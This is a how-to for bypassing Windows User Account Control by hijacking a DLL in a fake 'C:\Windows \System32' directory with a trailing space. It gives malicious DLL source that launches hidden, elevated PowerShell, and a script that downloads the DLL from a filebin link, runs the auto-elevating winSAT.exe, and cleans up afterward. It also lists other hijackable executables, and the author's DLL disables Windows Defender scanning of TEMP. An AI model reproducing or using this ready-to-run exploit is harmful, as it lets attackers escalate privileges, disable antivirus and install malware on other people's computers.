Originally discovered by Daniel Gebert
First, edit the file to download your malicious DLL from Filebin.
To easily create said DLL - I would modify this template with the code below:
dllmain.c
#include "pch.h"
#include "prxdll.h"   /* prx_attach / prx_detach come from the proxy-DLL template */
#include "windows.h"

BOOL APIENTRY DllMain(
    const HINSTANCE instance,
    const DWORD reason,
    const PVOID reserved)
{
    switch (reason) {
    case DLL_PROCESS_ATTACH:
        WinExec("powershell -NoProfile -ExecutionPolicy bypass -windowstyle hidden -Command \"Start-Process -verb runas powershell\" \"'-NoProfile -windowstyle hidden -ExecutionPolicy bypass -Command YOURPOWERSHELLCOMMANDHERE\" '\"", 1);
        DisableThreadLibraryCalls(instance);
        return prx_attach(instance);
    case DLL_PROCESS_DETACH:
        prx_detach(reserved);
        break;
    }
    return TRUE;
}
This should execute some PowerShell code as admin.
Next we need to find some auto-elevate applications. I prefer to use winSAT.exe as there is no visual GUI when run. Here's a list of some other auto-elevate applications (see the table at the end of this page).
Okay, so now you need to edit the PowerShell source code:
New-Item '\\?\C:\Windows \System32' -ItemType Directory
Set-Location -Path '\\?\C:\Windows \System32'
copy C:\Windows\System32\WinSAT.exe "C:\windows \System32\winSAT.exe"
Invoke-WebRequest -Uri 'https://filebin.net/bajzrgruy6h83o4n/version.dll' -OutFile 'version.dll'
Start-Process -Filepath 'C:\windows \System32\winSAT.exe'
Start-Sleep -s 1
Remove-Item '\\?\C:\Windows \' -Force -Recurse
First modification:
Build your DLL using Visual Studio and upload it to Filebin. My DLL adds a Windows Defender preference to not scan the TEMP directory.
Replace the Invoke-WebRequest Uri with your link, and replace the copy argument with the location of your Windows application.
Now for the final step - replace every newline with a semicolon and convert it into a batch script:
powershell.exe -windowstyle hidden -NoProfile -ExecutionPolicy bypass -Command "Yourcodehere"
And boom! You can execute that system command to bypass UAC!
Remember - you can program this into most high-level languages, as all you need to do is execute a system command!
Microsoft introduced UAC (User Account Control) with Windows Vista and Windows Server 2008.
In short, UAC aims to improve the security of Microsoft Windows by giving programs standard user privileges until an administrator authorizes an increase or elevation of permissions. (Wikipedia)
DLL hijacking means a program will load and execute a malicious DLL contained in the same folder as a data file opened by that program. (Wikipedia)
Here's a description I stole from Daniel's blog:
Mock directories are folders with a trailing space. For example:
C:\Windows \System32
See the space " " between "Windows" and "\System32".
Executable | DLL | Comment
--- | --- | ---
ComputerDefaults.exe | profapi.dll | Can also bypass UAC using other methods.
EASPolicyManagerBrokerHost.exe | profapi.dll |
fodhelper.exe | profapi.dll | Opens Settings and can be used to bypass UAC using other methods
FXSUNATD.exe | version.dll |
msconfig.exe | version.dll | Can also bypass UAC using other methods
OptionalFeatures.exe | profapi.dll | Opens Windows Optional Features
sdclt.exe | profapi.dll | Can also bypass UAC using other methods; opens Windows Backup
ServerManager.exe | profapi.dll | ServerManager.exe is not present by default
systemreset.exe | version.dll |
sysprep.exe | version.dll | Creates sub folder. Sysprep process has to be killed directly after UAC bypass, otherwise sysprep is executed!
SystemSettingsAdminFlows.exe | version.dll |
WinSAT.exe | version.dll |
WSReset.exe | profapi.dll | Opens Windows Store